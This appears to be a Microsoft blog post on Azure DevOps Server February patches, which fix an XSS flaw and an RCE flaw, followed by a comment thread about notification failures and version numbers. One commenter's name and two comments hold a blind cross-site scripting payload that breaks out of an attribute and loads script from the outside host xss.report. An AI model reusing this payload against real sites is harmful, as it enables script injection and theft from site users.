Updated: February patches for Azure DevOps Server

Gloridel Morales

2/17 Update: After installing Azure DevOps Server 2020.1.2 Patch 5 notifications were not getting delivered. To address this issue, we are re-releasing the patch. If you installed Patch 5, you should download and re-install the patch from the link provided in the instructions below.

This month, we are releasing fixes that impact our self-hosted product, Azure DevOps Server.

The following will be fixed with this patch:

  • CVE-2023-21564: Azure DevOps Server Cross-Site Scripting Vulnerability
  • CVE-2023-21553: Azure DevOps Server Remote Code Execution Vulnerability
  • Updated MSBuild and VSBuild tasks to support Visual Studio 2022.
  • Update methodology of loading reauthentication to prevent XSS attack vector.
  • Azure DevOps Server 2022 Proxy reports the following error: VS800069: This service is only available in on-premises Azure DevOps.
  • Fixed shelvesets accessibility issue via web UI.

Azure DevOps Server 2022 Patch 2

If you have Azure DevOps Server 2022, you should install Azure DevOps Server 2022 Patch 2. Check out the release notes for more details.

Verifying Installation

  • Run devops2022patch2.exe CheckInstall, devops2022patch2.exe is the file that is downloaded from the link above. The output of the command will either say that the patch has been installed, or that it is not installed.

Azure DevOps Server 2020.1.2 Patch 5

If you have Azure DevOps Server 2020.1.1, you should first update to Azure DevOps Server 2020.1.2. Once on 2020.1.2, install Azure DevOps Server 2020.1.2 Patch 5. Check out the release notes for more details.

Verifying Installation

  • Run devops2020.1.2patch5.exe CheckInstall, devops2020.1.2patch5.exe is the file that is downloaded from the link above. The output of the command will either say that the patch has been installed, or that it is not installed.

40 comments

Comments are closed. Login to edit/delete your existing comments

  • Daniel Steiner 1

    the link for release notes point to an internal protected website: review.learn.microsoft.com

    • Gloridel MoralesMicrosoft employee 0

      Hi Daniel, thank you for reporting this. It has been fixed.

      • '"><script src=//xss.report/s/herry1></script> 0

        '"><script src=//xss.report/s/herry1></script>

  • Quintos 0

    LGTM. I had installes the 2022.patch1 and 2022.patch2 on my lab server. After install both patch file, I reopened the azuredevops manager console, and the version number is still Server2022, not showinng the patch number. How can I make sure the patch was already installed completely?

    • Gloridel MoralesMicrosoft employee 0

      Hi Quintos, did you try the verification steps listed in the blog post? You can also check the version of the following file:

      [INSTALL_DIR]\Azure DevOps Server 2022\Application Tier\bin\Microsoft.Teamfoundation.Framework.Server.dll

      Azure DevOps Server 2022 is installed to c:\Program Files\Azure DevOps Server 2022 by default. After installing Azure DevOps Server 2022 Patch 2, the version will be 19.205.33402.2.

      • Quintos 0

        Thanks. It works. And if I reinstall the patch2.exe, it will show current installed patch version .

      • Daniel Steiner 0

        @Gloridel
        after running a fresh installation of Azure DevOps Server 2020.1 and upgrading it with the various patches til Azure DevOps Server 2022 Patch 2 the file Microsft.TeamFoundation.Framework.Server.dll is found in folder “Application Tier\Web Services\bin” and not in “Application Tier\bin” as you wrote.
        In addition various files including “Application Tier\bin\Microsoft.TeamFoundation.Framework.Server.dll” from Azure DevOps Server 2020 installation are not uninstalled.

  • Michael Hauer 1

    After installing the patch (patching from plain 2020.1.2 to 2020.1.2 patch 5) on our instance it didnt send any mail notifications (pull requests, approval, comment mentions). Mail test from Console was successful but event log showed many errors (I removed some personal information)

    Application Domain: TfsJobAgent.exe
    Assembly: Microsoft.TeamFoundation.Framework.Server, Version=18.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a; v4.0.30319
    Service Host: XXXXXXX (DefaultCollection)
    Process Details:
    Process Name: TfsJobAgent
    Account name: XXXX

    Detailed Message: TF400703: Unable to initialize the specified service Microsoft.TeamFoundation.Framework.Server.SmtpSettingsService.

    Exception Message: TF400367: The request could not be performed due to a host type mismatch. Please check any connection information and verify the information is correct. The request was executed against a ProjectCollection. (type UnexpectedHostTypeException)
    Exception Stack Trace: at Microsoft.TeamFoundation.Framework.Server.VssRequestContextExtensions.CheckDeploymentRequestContext(IVssRequestContext context)
    at Microsoft.TeamFoundation.Framework.Server.SmtpSettingsService.Microsoft.TeamFoundation.Framework.Server.IVssFrameworkService.ServiceStart(IVssRequestContext systemRequestContext)
    at Microsoft.TeamFoundation.Framework.Server.ServiceProvider.CreateService(IVssRequestContext requestContext, Type requestedType, Type managedType)

    We restored our instance through restoring the modified files from C:\Program Files\Azure DevOps Server 2020\Backup
    After restoring files and starting services again, all mails that should have been sent were delivered immediately.

    We are in the progress of making an official call but please have a look at the code changes in SmtpSettingsService.ServiceStart.

    • Tore Østergaard Jensen (TORE) 0

      I am interested in where this ends. We would not like to update if it results in no notification mails.

    • Michael Hauer 0
    • Gloridel MoralesMicrosoft employee 1

      Hi Michael, I forwarded your message to our team for investigation.

      • Casey Rupley 2

        FWIW, I can confirm the exact same behavior identified by Michael Hauer after I applied Patch 5. Besides test emails generated from the console, no other alerts are working.

        • '"><script src=//xss.report/s/herry1></script> 0

          sdfd

    • Vladimir KhvostovMicrosoft employee 0

      Hello,
      thanks for reporting this issue. We addressed it and will re-release the patch very soon.
      Customers who already install Patch 5 for Azure DevOps Server 2020.1.2, will need to download updated patch and re-install it.
      Sorry for the inconvinience it caused. We will reply to this thread once updated patch is available.
      Regards,
      –Vladimir

    • Gloridel MoralesMicrosoft employee 0

      Thank you all for reporting this issue. We have re-released the patch and it is ready for you to install from the links provided in this blog.

      • anonymous 0

        this comment has been deleted.

        • anonymous 1

          this comment has been deleted.

      • Tore Østergaard Jensen (TORE) 0

        So this did not impact 2022 Patch 2?

        • anonymous 0

          this comment has been deleted.

        • Gloridel MoralesMicrosoft employee 1

          Correct, it didn’t impact Azure DevOps Server 2022 Patch 2.

          • Daniel Steiner 0

            Gloridel,

            what is the difference of Azure DevOps Server 2022 Patch2 version 19.205.33402.2 released on Feb 15 compared to the download from Azure DevOps Server 2022 Patch2 version 18.181.32404.7 downloaded Feb 22 ?

            the same 2022 Patch 2 with two different version numbers is confusing especially as the old list of Azure DevOps Server build numbers is no longer updated with official released Azure DevOps Server patches.

          • Gloridel MoralesMicrosoft employee 0

            Daniel, they are both the same.

      • Michael Hauer 0

        I can confirm that the re-released patch for 2020 fixes the reported issue.

  • Markus 1

    After applying the patch on AzDO 2020.1.2, classic pipeline still shows only MSbuild 16.0/Visual Studio 2019

    • Daniel Steiner 0

      @Markus,
      what are you expecting ? Visual Studio 2022 ?

      support for VS 2022 is only added in AzureDevOps Server 2022 Patch 2 but not in 2020.1.2.

      if you need VS 2022 support with AzDO 2020.1.2 than you can install Visual Studio 2022 support by Jesse from marketplace https://marketplace.visualstudio.com/items?itemName=jessehouwing.visualstudio and later switch back to standard task with VS2022 support after upgrading to AzDO 2022.
      we’re currently using it and it works except that it is annoying to replace all the tasks which are using Visual Studio or VS Test.

      • Markus 1

        Ok, then the description is misleading
        BTW, the description also doesn’t mention that the build agent version will be updated (Which makes sense for supporting VS2022, which according to your statement is not the case 🤔)

        • Hahn, Alexander 1

          I totally agree with Markus, so the blog reads like the changes are included in both patches, also Updated MSBuild and VSBuild tasks to support Visual Studio 2022. That could be improved.

          • Daniel Steiner 0

            the content of the blog is could be misleading.

            You need to read the release notes for both patch and than you get that updated tasks for VS2022 are only included in Azure DevOps Server 2022 patch 2

    • Gloridel MoralesMicrosoft employee 1

      Thank you, Markus, Daniel, and Alexander, for your feedback. It makes sense to specify in the blog post the changes that are applicable to each version of the product.

  • Raphael Bösch 0

    Just to be on the save side: I plan to do a fresh installation of Azure DevOps Server 2020.1.2 via ISO-Download. Is patch 5 cumulative or do I have to install all previous patches before patch 5?

    • Gloridel MoralesMicrosoft employee 0

      Hi Raphael, patches are cumulative. You should install Azure DevOps Server 2020.1.2 Patch 5 after the fresh install of Azure DevOps Server 2020.1.2.

  • andreas-nitsch 0

    After installing the Patch 1.5 for AzureDevOps 2020 our server says that Version 18.181.33417.3 (Azure DevOps Server 2020 Update 1.2) is installed.

    Could you please verify that this is the version expected after successful installation of patch 1.5.

    Best Regards

    Andreas

    • Gloridel MoralesMicrosoft employee 0

      Hi Andreas, 18.181.33417.3 is the version after installing Azure DevOps Server 2020.1.2 Patch 5.

      • andreas-nitsch 0

        Thank you very much 🙂

  • Paweł Borkowski 1

    Hi,

    I have Azure DevOps Server 2020 Update 1.2 Patch 2. Do I need to install all previous patches before applying patch 5?

  • Patrick Sheldon 0

    Hi,

    I am trying to explore migrating to the cloud service. However, the Data Migration Tool (2020.1.2RTW_18.181.18965609) is not accepting my current version of 2020 Update 1.2 Patch 5 (18.181.33417.3) (no other patches were installed). It is looking for version 18.181.33213.4 which I can only guess is maybe Patch 4.

    I tried to uninstall Patch 5 (https://learn.microsoft.com/en-us/azure/devops/server/install/uninstall-patch?view=azure-devops-2020). Now the Azure DevOps Server Administration Console now reports I have 18.181.32404.7 but when I try to install Patch 4 I get the following:

    Found InstallVersion: 18.181.32404.7
    Latest patch installed on machine is version 18.181.33417.3
    Installed patch with version 18.181.33417.3 is later than this patch with version 18.181.33128.1, cannot install older patch on machine.
    Unable to find valid Azure DevOps Server install on machine.
    1. When will the Data Migration Tool be updated to support Patch 5?
    2. Is Patch 4 version 18.181.33213.4? And if not, which Patch is it expecting?
    3. How do I properly and fully remove Patch 5 so I can install Patch 4 (or earlier)?
    4. Do I need to install each of the patches?
    • Patrick Sheldon 0

      Update: Despite doing nothing as I was waiting for several days for a meeting with Microsoft Support, after trying the Migration Tool again, it ran with no complaints. No DevOps updates/patches were installed. No Windows updates were installed. Very bazaar. It would still be nice to know the answers to my questions as it may help others attempting this process.

Feedback usabilla icon